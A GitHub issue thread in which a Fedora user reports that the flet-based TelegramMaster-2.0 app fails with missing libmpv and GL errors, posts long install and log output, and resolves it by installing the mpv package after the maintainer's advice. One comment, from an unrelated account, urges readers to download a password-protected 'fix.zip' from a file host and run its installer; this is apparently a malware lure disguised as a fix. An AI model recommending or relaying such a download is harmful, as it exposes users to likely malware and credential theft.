### ISSUE TITLE
No GL implementation is available

### ISSUE THREAD

**Issue by khazovP** [pyadrus/TelegramMaster-2.0#15]
Hi, could you please take a look at this issue?

OS: Fedora Linux 40 (Workstation)

Steps made:

`git clone https://github.com/pyadrus/TelegramMaster-2.0.git`

Cloning into 'TelegramMaster-2.0'...
remote: Enumerating objects: 3998, done.
remote: Counting objects: 100% (1078/1078), done.
remote: Compressing objects: 100% (281/281), done.
remote: Total 3998 (delta 794), reused 1058 (delta 780), pack-reused 2920 (from 1)
Receiving objects: 100% (3998/3998), 17.60 MiB | 28.48 MiB/s, done.
Resolving deltas: 100% (2686/2686), done.

`cd TelegramMaster-2.0/`

`python -m venv .venv`

`source .venv/bin/activate`

`pip install -r requirements.txt `

...

Installing collected packages: text-unidecode, pypng, pyaes, websockets, watchdog, uvloop, urllib3, typing-extensions, types-python-dateutil, sniffio, six, schedule, rapidfuzz, pyyaml, python-slugify, python-dotenv, PySocks, pygments, pyasn1, packaging, oauthlib, mdurl, MarkupSafe, loguru, idna, httptools, h11, configparser, click, charset-normalizer, chardet, certifi, annotated-types, uvicorn, thefuzz, rsa, requests, repath, qrcode, python-dateutil, pydantic-core, markdown-it-py, Jinja2, httpcore, binaryornot, anyio, watchfiles, Telethon, starlette, rich, pydantic, httpx, flet-core, arrow, flet-runtime, fastapi, cookiecutter, flet
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 PySocks-1.7.1 Telethon-1.36.0 annotated-types-0.7.0 anyio-4.4.0 arrow-1.3.0 binaryornot-0.4.4 certifi-2024.7.4 chardet-5.2.0 charset-normalizer-3.3.2 click-8.1.7 configparser-7.0.1 cookiecutter-2.6.0 fastapi-0.112.2 flet-0.23.2 flet-core-0.23.2 flet-runtime-0.23.2 h11-0.14.0 httpcore-1.0.5 httptools-0.6.1 httpx-0.27.2 idna-3.8 loguru-0.7.2 markdown-it-py-3.0.0 mdurl-0.1.2 oauthlib-3.2.2 packaging-23.2 pyaes-1.6.1 pyasn1-0.6.0 pydantic-2.8.2 pydantic-core-2.20.1 pygments-2.18.0 pypng-0.20220715.0 python-dateutil-2.9.0.post0 python-dotenv-1.0.1 python-slugify-8.0.4 pyyaml-6.0.2 qrcode-7.4.2 rapidfuzz-3.9.6 repath-0.9.0 requests-2.32.3 rich-13.8.0 rsa-4.9 schedule-1.2.2 six-1.16.0 sniffio-1.3.1 starlette-0.38.2 text-unidecode-1.3 thefuzz-0.22.1 types-python-dateutil-2.9.0.20240821 typing-extensions-4.12.2 urllib3-2.2.2 uvicorn-0.30.6 uvloop-0.20.0 watchdog-4.0.2 watchfiles-0.24.0 websockets-13.0.1

[notice] A new release of pip is available: 23.3.2 -> 24.2
[notice] To update, run: pip install --upgrade pip

`python main.py`

/home/user/.flet/bin/flet-0.23.2/flet/flet: error while loading shared libraries: libmpv.so.1: cannot open shared object file: No such file or directory

`sudo dnf install mpv-devel`

...

Installed:
  SDL2-devel-2.30.3-1.fc40.x86_64                                                              
  alsa-lib-devel-1.2.12-1.fc40.x86_64                                                          
  brotli-1.1.0-3.fc40.x86_64                                                                   
  brotli-devel-1.1.0-3.fc40.x86_64                                                             
  bzip2-devel-1.0.8-18.fc40.x86_64                                                             
  cairo-devel-1.18.0-3.fc40.x86_64                                                             
  cmake-filesystem-3.28.2-1.fc40.x86_64                                                        
  compat-lua-devel-5.1.5-25.fc40.x86_64                                                        
  compat-lua-libs-5.1.5-25.fc40.x86_64                                                         
  fftw-3.3.10-12.fc40.x86_64                                                                   
  fftw-devel-3.3.10-12.fc40.x86_64                                                             
  fftw-libs-3.3.10-12.fc40.x86_64                                                              
  fftw-libs-long-3.3.10-12.fc40.x86_64                                                         
  fftw-libs-quad-3.3.10-12.fc40.x86_64                                                         
  fftw-libs-single-3.3.10-12.fc40.x86_64                                                       
  fontconfig-devel-2.15.0-6.fc40.x86_64                                                        
  freeglut-devel-3.6.0-1.fc40.x86_64                                                           
  freetype-devel-2.13.2-5.fc40.x86_64                                                          
  fribidi-devel-1.0.14-2.fc40.x86_64                                                           
  gl-manpages-1.1-31.20190306.fc40.noarch                                                      
  glib2-devel-2.80.3-1.fc40.x86_64                                                             
  graphite2-devel-1.3.14-15.fc40.x86_64                                                        
  harfbuzz-devel-8.5.0-1.fc40.x86_64                                                           
  imlib2-1.11.1-5.fc40.x86_64                                                                  
  imlib2-devel-1.11.1-5.fc40.x86_64                                                            
  jack-audio-connection-kit-devel-1.9.22-5.fc40.x86_64                                         
  lcms2-devel-2.16-3.fc40.x86_64                                                               
  libX11-devel-1.8.10-1.fc40.x86_64                                                            
  libXScrnSaver-1.2.4-3.fc40.x86_64                                                            
  libXScrnSaver-devel-1.2.4-3.fc40.x86_64                                                      
  libXau-devel-1.0.11-6.fc40.x86_64                                                            
  libXext-devel-1.3.6-1.fc40.x86_64                                                            
  libXft-devel-2.3.8-6.fc40.x86_64                                                             
  libXpresent-1.0.0-21.fc40.x86_64                                                             
  libXpresent-devel-1.0.0-21.fc40.x86_64                                                       
  libXrandr-devel-1.5.4-3.fc40.x86_64                                                          
  libXrender-devel-0.9.11-6.fc40.x86_64                                                        
  libXv-devel-1.0.12-3.fc40.x86_64                                                             
  libarchive-devel-3.7.2-4.fc40.x86_64                                                         
  libass-devel-0.17.1-4.fc40.x86_64                                                            
  libavcodec-free-devel-6.1.1-19.fc40.x86_64                                                   
  libavdevice-free-devel-6.1.1-19.fc40.x86_64                                                  
  libavfilter-free-devel-6.1.1-19.fc40.x86_64                                                  
  libavformat-free-devel-6.1.1-19.fc40.x86_64                                                  
  libavutil-free-devel-6.1.1-19.fc40.x86_64                                                    
  libblkid-devel-2.40.1-1.fc40.x86_64                                                          
  libbluray-devel-1.3.4-5.fc40.x86_64                                                          
  libcaca-devel-0.99-0.73.beta20.fc40.x86_64                                                   
  libcdio-devel-2.1.0-12.fc40.x86_64                                                           
  libcdio-paranoia-devel-10.2+2.0.1-12.fc40.x86_64                                             
  libdatrie-devel-0.2.13-9.fc40.x86_64                                                         
  libdovi-devel-3.3.0-2.fc40.x86_64                                                            
  libdrm-devel-2.4.122-1.fc40.x86_64                                                           
  libdvdnav-devel-6.1.1-8.fc40.x86_64                                                          
  libdvdread-devel-6.1.3-6.fc40.x86_64                                                         
  libffi-devel-3.4.4-7.fc40.x86_64                                                             
  libglvnd-core-devel-1:1.7.0-4.fc40.x86_64                                                    
  libglvnd-devel-1:1.7.0-4.fc40.x86_64                                                         
  libicu-devel-74.2-1.fc40.x86_64                                                              
  libjpeg-turbo-devel-3.0.2-1.fc40.x86_64                                                      
  libmount-devel-2.40.1-1.fc40.x86_64                                                          
  libpciaccess-devel-0.16-12.fc40.x86_64                                                       
  libplacebo-devel-6.338.2-1.fc40.x86_64                                                       
  libpng-devel-2:1.6.40-3.fc40.x86_64                                                          
  libpostproc-free-devel-6.1.1-19.fc40.x86_64                                                  
  libquadmath-14.2.1-1.fc40.x86_64                                                             
  libsamplerate-devel-0.2.2-8.fc40.x86_64                                                      
  libselinux-devel-3.6-4.fc40.x86_64                                                           
  libsepol-devel-3.6-3.fc40.x86_64                                                             
  libshaderc-devel-2024.2-1.fc40.x86_64                                                        
  libswresample-free-devel-6.1.1-19.fc40.x86_64                                                
  libswscale-free-devel-6.1.1-19.fc40.x86_64                                                   
  libthai-devel-0.1.29-8.fc40.x86_64                                                           
  libudfread-devel-1.1.2-8.fc40.x86_64                                                         
  libunwind-devel-1.8.0-3.fc40.x86_64                                                          
  libva-devel-2.21.0-3.fc40.x86_64                                                             
  libvdpau-devel-1.5-6.fc40.x86_64                                                             
  libvdpau-trace-1.5-6.fc40.x86_64                                                             
  libxcb-devel-1.17.0-1.fc40.x86_64                                                            
  libxkbcommon-devel-1.6.0-2.fc40.x86_64                                                       
  libxml2-devel-2.12.8-1.fc40.x86_64                                                           
  mesa-libEGL-devel-24.1.6-1.fc40.x86_64                                                       
  mesa-libGL-devel-24.1.6-1.fc40.x86_64                                                        
  mesa-libGLU-devel-9.0.3-4.fc40.x86_64                                                        
  mesa-libgbm-devel-24.1.6-1.fc40.x86_64                                                       
  mpv-devel-0.37.0-4.fc40.x86_64                                                               
  mpv-libs-0.37.0-4.fc40.x86_64                                                                
  mujs-1.3.3-5.fc40.x86_64                                                                     
  mujs-devel-1.3.3-5.fc40.x86_64                                                               
  ncurses-c++-libs-6.4-12.20240127.fc40.x86_64                                                 
  ncurses-devel-6.4-12.20240127.fc40.x86_64                                                    
  nv-codec-headers-12.1.14.0-3.fc40.noarch                                                     
  openal-soft-devel-1.23.1-5.fc40.x86_64                                                       
  openssl-devel-1:3.2.1-2.fc40.x86_64                                                          
  pango-devel-1.54.0-1.fc40.x86_64                                                             
  pcre2-devel-10.44-1.fc40.x86_64                                                              
  pipewire-devel-1.0.7-2.fc40.x86_64                                                           
  pixman-devel-0.43.4-1.fc40.x86_64                                                            
  pulseaudio-libs-devel-16.1-7.fc40.x86_64                                                     
  python3-devel-3.12.5-1.fc40.x86_64                                                           
  rubberband-devel-3.3.0-6.fc40.x86_64                                                         
  slang-devel-2.3.3-5.fc40.x86_64                                                              
  sysprof-capture-devel-46.0-1.fc40.x86_64                                                     
  uchardet-devel-0.0.8-5.fc40.x86_64                                                           
  vapoursynth-devel-65-2.fc40.x86_64                                                           
  vulkan-headers-1.3.290.0-1.fc40.noarch                                                       
  vulkan-loader-devel-1.3.290.0-1.fc40.x86_64                                                  
  wayland-devel-1.22.0-3.fc40.x86_64                                                           
  wayland-protocols-devel-1.36-1.fc40.noarch                                                   
  xorg-x11-proto-devel-2024.1-2.fc40.noarch                                                    
  xz-devel-1:5.4.6-3.fc40.x86_64                                                               
  zimg-devel-3.0.5-2.fc40.x86_64                                                               
  zlib-ng-compat-devel-2.1.7-1.fc40.x86_64                                                     

Complete!

`cd /usr/lib64`

`ls -l | grep libmpv`

lrwxrwxrwx. 1 root root        11 Feb  4  2024 libmpv.so -> libmpv.so.2
lrwxrwxrwx. 1 root root        15 Feb  4  2024 libmpv.so.2 -> libmpv.so.2.2.0
-rwxr-xr-x. 1 root root   2894208 Feb  4  2024 libmpv.so.2.2.0

`sudo ln -s libmpv.so.2.2.0 libmpv.so.1`

`python main.py` 

(flet:91941): Gdk-CRITICAL **: 06:22:43.924: gdk_gl_context_make_current: assertion 'GDK_IS_GL_CONTEXT (context)' failed

** (flet:91941): WARNING **: 06:22:43.924: Failed to initialize GLArea: No GL implementation is available
package:media_kit_libs_linux registered.

** (flet:91941): CRITICAL **: 06:22:45.298: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.305: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.312: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.319: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.326: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.333: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.340: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.347: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.354: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.360: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.367: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.374: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.381: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.389: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.395: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.402: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.409: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.416: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.423: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:45.430: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.276: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.283: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.290: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.297: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.304: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.310: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.318: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.324: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.331: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:46.339: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.896: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.903: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.910: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.917: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.924: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.931: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.938: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

** (flet:91941): CRITICAL **: 06:22:49.945: void fl_keyboard_manager_sync_modifier_if_needed(FlKeyboardManager *, guint, double): assertion 'FL_IS_KEYBOARD_MANAGER(self)' failed

![image](https://github.com/user-attachments/assets/c8580200-040f-42cc-a130-493fd5acab0a)

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pyadrus** [comment]
To work with flet, it is advisable to install python 3.12. To solve your problem, you can try `sudo apt install libmpv-dev mpv`. If there are any more questions, you can write **https://t.me/PyAdminRU** .

A similar question is in the flet library https://github.com/flet-dev/flet/issues/2637

**Comment by khazovP** [comment]
Previously I did only:
`dnf install mpv-devel`

After installing main package it started to work
`dnf install mpv`

Thank you!
